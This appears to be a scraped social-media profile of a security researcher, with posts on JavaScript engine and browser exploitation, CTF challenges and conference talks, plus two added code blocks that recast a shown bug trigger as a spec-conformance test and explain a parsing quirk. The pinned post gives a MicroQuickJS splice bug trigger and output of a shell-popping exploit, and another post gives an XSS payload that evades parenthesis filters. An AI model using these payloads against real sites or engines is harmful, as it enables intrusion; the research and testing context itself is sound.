itszn
@itszn13
Amy | Security researcher @ OpenAI | stackchk.fail/ctf.txt | bsky: nyanbox.stackchk.fail | LLM ART: bsky.app/profile/altern…
she/her
Joined June 2011
  • Pinned
    When MicroQuickJS released, I spent 8.5 hours to summon an Exploit for it. Here is the Fault:
    var arr = new Array(30)
    var attack = {
      valueOf: function() {
        arr.length = 0
        arr.length = 3
        return 10
      }
    }
    arr.splice(attack, 30)
    I document the full Ritual Process below
    New JS engine, old JS vulns :) Found a bug and wrote an exploit in 8 hours 645da364a8089c43953b345d3004fc76148cb2f136f74e211429ddc8452846d1 exp-shell.js ./mqjs ./exp-shell.js LEAKED: 77b6 1c5ff205 LIBC BASE: 77b6 1d600000 STACK PTR: 7ffd 143e1bb8 WROTE ROP CHAIN $ whoami nyan
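    The re-entrancy pattern from the pinned post, written up as an added conformance check that is not part of the original thread or of MicroQuickJS: a `valueOf` that shrinks the array while `Array.prototype.splice` is still coercing its arguments. A spec-conformant engine reads `length` once, lets user code run during the `start` coercion, and afterwards only touches elements through property lookups, so the shrink is harmless and the observable outcome is fixed by the spec. An engine that instead indexes its backing buffer with the cached length is the class of bug described above, and running this check against a new engine and comparing the returned values with the spec-derived ones is a cheap regression test.

```javascript
// Added example (not from the original post or the MicroQuickJS project).
// Reproduces the re-entrant splice from the pinned tweet and returns what a
// spec-conformant engine (e.g. Node/V8) must observe, so the same check can
// be run against any other engine as a differential test.
function reentrantSpliceCheck() {
  const arr = new Array(30);            // length 30, every slot a hole
  const log = [];
  const attack = {
    valueOf() {
      // Runs inside splice, after it has already cached len = 30.
      log.push(`valueOf entered with length=${arr.length}`);
      arr.length = 0;                   // shrink the backing store ...
      arr.length = 3;                   // ... and regrow it to 3
      return 10;                        // becomes actualStart
    },
  };
  const removed = arr.splice(attack, 30);
  return {
    // actualDeleteCount = min(30, len - actualStart) = 20, from the cached len
    removedLength: removed.length,
    // no element existed when splice looked them up, so nothing was copied
    removedOwnKeys: Object.keys(removed).length,
    // final length = len - actualDeleteCount + itemCount = 30 - 20 + 0 = 10
    finalLength: arr.length,
    log,
  };
}

// Compares an engine's observed behaviour with the spec-derived expectations;
// any mismatch means the engine handled the user callback differently (or, for
// a raw-buffer fast path, that it read stale state and should be investigated).
function conformsToSpec(result) {
  return result.removedLength === 20 &&
         result.removedOwnKeys === 0 &&
         result.finalLength === 10 &&
         result.log.length === 1;
}

if (typeof require !== 'undefined' && require.main === module) {
  const r = reentrantSpliceCheck();
  console.log(r, 'conforms:', conformsToSpec(r));
}
```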
  • Claude reversing a binary using Binary Ninja via MCP while I get a snack @bl4sty @ziyadedher @vector35
    who's building the IDA Pro MCP? "please annotate the shit out of this monolithic 64MiB firmware binary while I get some coffee, will ya?"
  • Decided to take @qwertyoruiopz's nday and write a full exploit for it. Here is an exploit for iOS 12.3.1 doing SOP bypass via arbitrary read/write
  • Scientists say that Dark Matter takes up 85% of matter in our universe. But what they don't know is that it is made up entirely of Page Tables that keep track of the rest of the matter
  • You can see the heap bof at the end of the payload, where they are still using aaaaaaaaaaaaa to pad. What is this? A CTF exploit?
    This is the complete DNA of the Coronavirus (SARS-CoV-2). We are being attacked by a 8 kilobytes virus. Remember this when you hate on computers security. (source: ncbi.nlm.nih.gov/nuccore/MN9089… )
  • If you ever tried to perform XSS without parenthesis, you may have realized that eval`payload` does not work. However you can do this instead: Function`alert\`xss\````
  • Here is my exploit for the ChakraCore JIT exploit challenge for @TrendMicroCTF 2019 Was fun to take a break from V8 and JavaScriptCore
  • Have you ever wanted to learn how to bypass PAC, but you don't have the hardware or time to set up emulation? You are in luck! We now have an *in browser* intro PAC exploitation challenge you can play right now!
    Exploiting the notoriously unsafe gets() on a PAC-protected ARM64 binary, how hard could it be? Check out our latest blogpost to find out: blog.ret2.io/2021/06/16/int…
  • Today is the 10 year anniversary of the first time I ever pwned anything! My first exploit was a simple stack smash, overwrite return ptr, jump to admin function. This was an internal recruiting CTF by @gaasedelen for the RPISEC Before that day I had never even considered
  • Tricky JavaScript Syntax - Without trying it, what will this function return:
    function foo(a1, a2) {
      if (a1) return {
        if (a2) {
          return 'bar';
        }
      }
    }
    let answer = foo(1,1)
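    An added example, not from the original post, that evaluates the snippet above and sets it beside the variant with a line break after `return`, to show which parsing rule decides the answer. With `{` on the same line as `return`, the braces are an object literal and `if (a2) { return 'bar'; }` is a method definition whose name is the reserved word `if` (any IdentifierName is allowed as a property name, so `foo(1, 1)` returns an object, not a string). With a line break after `return`, automatic semicolon insertion ends the statement first and the braces become a block. Either reading is worth knowing when writing a JavaScript filter or sanitizer that assumes a keyword cannot be a property name. The helper names below are hypothetical.

```javascript
// Added example (not from the original post). Helper names are hypothetical.

// The snippet from the tweet: `return {` on one line makes the braces an
// object literal, and `if (a2) { ... }` inside it is a method named "if".
function foo(a1, a2) {
  if (a1) return {
    if (a2) {
      return 'bar';
    }
  }
}

// Same tokens with a line break after `return`: ASI turns it into `return;`
// and the braces become an ordinary block statement that runs when a1 is falsy.
function fooWithLineBreak(a1, a2) {
  if (a1) return
  {
    if (a2) {
      return 'bar';
    }
  }
}

// Renders a return value in a way that makes the two parses distinguishable.
function describe(value) {
  if (value === undefined) return 'undefined';
  if (value !== null && typeof value === 'object' && typeof value.if === 'function') {
    return 'object with a method named "if"; value.if(1) -> ' + value.if(1);
  }
  return String(value);
}

// Collects the outcomes for both functions and both truthiness cases.
function answers() {
  return {
    sameLine: describe(foo(1, 1)),
    sameLineFalsy: describe(foo(0, 1)),          // the `if (a1)` never fires
    lineBreak: describe(fooWithLineBreak(1, 1)), // `return;` wins
    lineBreakFalsy: describe(fooWithLineBreak(0, 1)), // block runs, returns 'bar'
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(answers());
}
```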
  • The video of my BlueHatIL talk is now online! Check out how I attack other websites from inside the Safari Sandbox Forget the Sandbox Escape: Abusing Browsers from Code Execution
  • Been waiting to announce: I'll be presenting "Forget the Sandbox Escape: Abusing Browsers from Code Execution" at this year's BluehatIL This talk will look at what attacks you can pull off in browsers without needing a sandbox escape I will also be demoing a POC of persistence
    The wait is finally over! Registration & schedule for #BlueHatIL 2020 are live. Places are limited so register NOW: bluehatil.com
  • Watch it to the end to see real pwning :)
  • Is this what people mean when they talk about free speech?